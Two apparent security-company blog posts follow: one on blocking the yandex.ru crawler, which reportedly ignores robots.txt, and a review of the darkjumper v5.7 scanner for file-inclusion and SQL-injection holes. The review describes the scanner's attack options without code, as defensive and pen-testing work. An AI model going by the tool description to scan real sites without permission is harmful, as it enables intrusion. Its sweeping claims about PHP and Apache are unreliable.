Yandex.ru Indexing Crawler Issues

The yandex.ru crawler is an indexing application that spiders hosts and puts the results into the yandex.ru search engine. Like Google, Bing and other search engines, the system searches out new contents on the web continually and adds the content to the search engine database. Usually, these types of activities cause little issues for those whose sites are being indexed, and in fact, over the years an etiquette system based on rules placed in the robots.txt file of a web site has emerged.

Robots.txt files provide a rule set for search engine behaviors. They indicate what areas of a site a crawler may index and what sections of the site are to be avoided. Usually this is used to protect overly dynamic areas of the site where a crawler could encounter a variety of problems or inputs that can have either bandwidth or application issues for either the crawler, the web host or both. 

Sadly, many web crawlers and index bots do not honor the rules of robots.txt. Nor do attackers who are indexing your site for a variety of attack reasons. Given the impacts that some of these indexing tools can have on bandwidth, CPU use or database connectivity, other options for blocking them are sometimes sought. In particular, there are a lot of complaints about yandex.ru and their aggressive parsing, application interaction and deep site inspection techniques. They clearly have been identified as a search engine that does not seem to respect the honor system of robots.txt. A Google search for “yandex.ru ignores robots.txt” will show you a wide variety of complaints.

In our monitoring of the HITME traffic, we have observed many deep crawls by yandex.ru from a variety of IP ranges. In the majority of them, they either never requested the robots.txt file at all, or they simply ignored the contents of the file altogether. In fact, some of our HITME web applications have experienced the same high traffic cost concerns that other parts of the web community have been complaining about. In a couple of cases, the cost for supporting the scans of yandex.ru represent some 30+% of the total web traffic observed by the HITME end point. From our standpoint, that’s a pain in the pocketbook and in our attention span, to continually parse their alert traffic out of our metrics.

Techniques for blocking yandex.ru more forcibly than robots.txt have emerged. You can learn about some of them by searching “blocking yandex.ru”. The easiest and what has proven to be an effective way, is to use .htaccess rules. We’ve also had some more modest success with forcibly returning redirects to requests with known url parameters associated with yandex.ru, along with some level of success by blocking specific IPs associated with them via an ignore rule in HoneyPoint.

If you are battling yandex.ru crawling and want to get some additional help, drop us a comment or get in touch via Twitter (@lbhuston, @microsolved). You can also give an account representative a call to arrange for a more technical discussion. We hope this post helps some folks who are suffering increased bandwidth use or problems with their sites/apps due to this and other indexing crawler issues. Until next time, stay safe out there!

Review of darkjumper v5.7

In continuing our research and experimentation with PHP and the threat of Remote File Inclusion (RFI), our team has been seeking out and testing various tools that have been made available to help identify web sites that are vulnerable to RFI during our penetration tests. Because we’re constantly finding more tools to add to the list, we’ve started the evaluation this week with the release of darkjumper v5.7. This python tool prides itself on being cross platform, and at first glance, seems rather easy to use. After downloading the tarball and extracting the files, simply calling the script from the command line brings it to life.

Running again with the –help or -h switches will print the options to the menu. This tool has several helpful options that could help expedite the discovery of various attack vectors against the web site. The injection switch incorporates a full barrage of SQLi and blind SQLi attempts against every web site identified on the target server. We did not use this option for this evaluation but intend to thoroughly test it in the future.

Using the inclusion switch will test for both local file inclusion (LFI) and RFI, again on every website identified on the target. This is our main focus for the evaluation since we’ve seen an incredible number of RFI attacks in the recent HITME data from around the globe. Selection of the full switch will attack the target server with the previously mentioned checks, in addition to scanning cgi directories, user enumeration, port scanning, header snatching, and several other possibly useful options. While a full review of this tool will be written eventually, we’re focusing on the RFI capabilities this time, so we’re using this test only against our test target. The test appears quite comprehensive. Another seemingly useful function of this tool is its ability to discover virtual hosts the live on the target server. After a short wait, darkjumper works it’s magic and spits out several files with various information for us to review. After pouring through these files, our team was disappointed to realize that there were URLs that pointed to this server which seem to have been missed by the tools scans. Even more disappointing is the fact that of the 12 target sites identified by the tool, none were the target that we had suspected of being vulnerable to RFI.

File inclusion is a real threat in the wild today. We are seeing newly vulnerable and compromised hosts on a regular basis from the HITME data, and seeing that Apache ships with a default configuration that is vulnerable to these attacks and the fact that PHP is inherently insecure, makes the battle even more intense. It is absolutely critical in this environment that we are hardening our servers before bringing them online. Those of us developing our web applications are validating every bit of information that is submitted to us by our users! Allowing our servers to execute code from an unknown source is one of the most popular attack vectors today from SQL injection, to XSS and XSRF, to RFI. The Internet continues to be a digital equivalent to the wild, wild west, where outlaws abound. There is no guarantee that the users who interface with our sites are who they say they are or that they have the best of intentions. It is up to us to control how our applications and servers are handling this data.